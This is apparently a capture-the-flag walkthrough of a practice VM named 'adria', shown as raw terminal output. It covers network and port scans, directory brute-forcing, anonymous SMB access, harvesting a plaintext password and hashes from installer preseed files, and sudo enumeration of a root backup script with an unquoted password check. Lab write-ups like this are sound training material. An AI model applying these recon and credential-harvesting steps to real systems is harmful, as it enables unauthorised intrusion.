a ctfer on the load

1
┌──(kali㉿kali)-[~]
2
└─$ sudo arp-scan -l
3
Interface: eth0, type: EN10MB, MAC: 12:37:b3:be:69:38, IPv4: 192.168.31.183
4
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
5
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
6
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
7
192.168.31.1    58:ea:1f:38:ff:17       (Unknown)
8
192.168.31.102  08:00:27:96:ce:01       (Unknown)
9
192.168.31.186  42:60:96:7b:26:bd       (Unknown: locally administered)
10

11
3 packets received by filter, 0 packets dropped by kernel
12
Ending arp-scan 1.10.0: 256 hosts scanned in 1.864 seconds (137.34 hosts/sec). 3 responded
13

14
┌──(kali㉿kali)-[~]
15
└─$ nmap -sV -sC -T4 -Pn -p- 192.168.31.102
16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-24 22:21 HKT
17
Nmap scan report for 192.168.31.102
18
Host is up (0.0014s latency).
19
Not shown: 65531 closed tcp ports (reset)
20
PORT    STATE SERVICE     VERSION
21
22/tcp  open  ssh         OpenSSH 9.2p1 Debian 2 (protocol 2.0)
22
| ssh-hostkey:
23
|   256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)
24
|_  256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)
25
80/tcp  open  http        Apache httpd 2.4.57 ((Debian))
26
|_http-title: Did not follow redirect to http://adria.hmv/
27
| http-robots.txt: 7 disallowed entries
28
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/
29
|_/updates/
30
|_http-server-header: Apache/2.4.57 (Debian)
31
139/tcp open  netbios-ssn Samba smbd 4.6.2
32
445/tcp open  netbios-ssn Samba smbd 4.6.2
33
MAC Address: 08:00:27:96:CE:01 (Oracle VirtualBox virtual NIC)
34
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1
┌──(kali㉿kali)-[~]
2
└─$ dirsearch -u http://192.168.31.102 -i 200,301
3
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
4
  from pkg_resources import DistributionNotFound, VersionConflict
5

6
  _|. _ _  _  _  _ _|_    v0.4.3
7
 (_||| _) (/_(_|| (_| )
8

9
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
10
Wordlist size: 11460
11

12
Output File: /home/kali/reports/http_192.168.31.102/_25-02-24_22-30-28.txt
13

14
Target: http://192.168.31.102/
15

16
[22:30:28] Starting:
17
[22:30:39] 200 -  247B  - /.gitignore
18
[22:31:41] 200 -   15KB - /changelog.txt
19
[22:31:47] 200 -    4KB - /CONTRIBUTING.md
20
[22:31:58] 200 -  851B  - /favicon.ico
21
[22:32:13] 200 -   12KB - /license.txt
22
[22:32:29] 200 -    1KB - /panel.php
23
[22:32:29] 200 -    1KB - /panel.aspx
24
[22:32:30] 200 -    1KB - /panel.jsp
25
[22:32:30] 200 -    1KB - /panel.html
26
[22:32:30] 200 -    1KB - /panel/
27
[22:32:44] 200 -    5KB - /README.md
28
[22:32:47] 200 -   94B  - /robots.txt
29
[22:32:55] 200 -  212B  - /sitemap.xml
30

31
Task Completed

1
┌──(kali㉿kali)-[~]
2
└─$ smbclient -L //192.168.31.102 -N
3

4
        Sharename       Type      Comment
5
        ---------       ----      -------
6
        print$          Disk      Printer Drivers
7
        DebianShare     Disk
8
        IPC$            IPC       IPC Service (Samba 4.17.12-Debian)
9
        nobody          Disk      Home Directories
10
Reconnecting with SMB1 for workgroup listing.
11
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
12
Protocol negotiation to server 192.168.31.102 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
13
Unable to connect with SMB1 -- no workgroup available
14

15
┌──(kali㉿kali)-[~/Desktop]
16
└─$ smbclient  //192.168.31.102/DebianShare
17
Password for [WORKGROUP\kali]:
18
Try "help" to get a list of possible commands.
19
smb: \> ls
20
  .                                   D        0  Mon Dec  4 17:32:45 2023
21
  ..                                  D        0  Sat Jul 22 16:10:13 2023
22
  configz.zip                         N  2756857  Mon Nov  6 23:56:25 2023
23

24
                19480400 blocks of size 1024. 15686980 blocks available
25
smb: \> get configz.zip
26
getting file \configz.zip of size 2756857 as configz.zip (26655.8 KiloBytes/sec) (average 26655.9 KiloBytes/sec)
27
smb: \>

1
┌──(kali㉿kali)-[~/Desktop]
2
└─$ cd configz
3

4
┌──(kali㉿kali)-[~/Desktop/configz]
5
└─$ ls
6
boot  isolinux  preseed
7

8
┌──(kali㉿kali)-[~/Desktop/configz]
9
└─$ grep -r "user"
10
preseed/master.preseed:d-i passwd/user-fullname string admin
11
preseed/master.preseed:d-i passwd/username string admin
12
preseed/master.preseed:d-i passwd/user-password password jojo1989
13
preseed/master.preseed:d-i user-setup/allow-password-weak boolean true
14
preseed/master.seed:# To create a normal user account.
15
preseed/master.seed:d-i passwd/user-fullname string Adam Lewis
16
preseed/master.seed:d-i passwd/username string alewis
17
preseed/master.seed:# Normal user's password, either in clear text
18
preseed/master.seed:#d-i passwd/user-password password insecure
19
preseed/master.seed:#d-i passwd/user-password-again password insecure
20
preseed/master.seed:d-i passwd/user-password-crypted 158f5ddb69d03f91bb449ee170913268
21
preseed/master.seed:# Create the first user with the specified UID instead of the default.
22
preseed/master.seed:d-i passwd/user-uid string 1010
23
preseed/master.seed:#d-i user-setup/allow-password-weak boolean true
24
grep: boot/grub/x86_64-efi/legacycfg.mod: binary file matches
25
grep: boot/grub/x86_64-efi/read.mod: binary file matches
26
grep: boot/grub/x86_64-efi/password.mod: binary file matches
27
grep: boot/grub/x86_64-efi/password_pbkdf2.mod: binary file matches
28
grep: boot/grub/x86_64-efi/bsd.mod: binary file matches
29
grep: boot/grub/efi.img: binary file matches
30
grep: isolinux/libcom32.c32: binary file matches
31
isolinux/ks.cfg:#Initial user
32
isolinux/ks.cfg:user cscience --fullname "Coin Science" --iscrypted --password $1$cw7eQ/70$/8ZeZKBBBJPtIFdnibj/X/
33
grep: isolinux/en.hlp: binary file matches
34
grep: isolinux/nb.tr: binary file matches
35
isolinux/f9.txt:and the next user who comes up with the same problem will profit from your
36
grep: isolinux/ldlinux.c32: binary file matches
37
grep: isolinux/bootlogo: binary file matches
38
grep: isolinux/si.hlp: binary file matches
39
grep: isolinux/ka.hlp: binary file matches

1
www-data@adria:/var/www/html/uploads$ sudo -l
2
sudo -l
3
sudo: unable to resolve host adria: No address associated with hostname
4
Matching Defaults entries for www-data on adria:
5
    env_reset, mail_badpass,
6
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
7
    use_pty
8

9
User www-data may run the following commands on adria:
10
    (adriana) NOPASSWD: /usr/bin/scalar

1
sudo -l
2
sudo: unable to resolve host adria: No address associated with hostname
3
Matching Defaults entries for adriana on adria:
4
    env_reset, mail_badpass,
5
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
6
    use_pty
7

8
User adriana may run the following commands on adria:
9
    (ALL : ALL) NOPASSWD: /opt/backup

1
cat /opt/backup
2
#!/bin/bash
3

4
PASSWORD=$(/usr/bin/cat /root/pass)
5

6
read -ep "Password: " USER_PASS
7

8
if [[ $PASSWORD == $USER_PASS ]] ; then
9

10
  /usr/bin/echo "Authorized access"
11
  /usr/bin/sleep 1
12
  /usr/bin/zip -r -e -P "$PASSWORD" /opt/backup.zip /var/www/html
13
else
14
  /usr/bin/echo "Access denied"
15
  exit 1
16
fi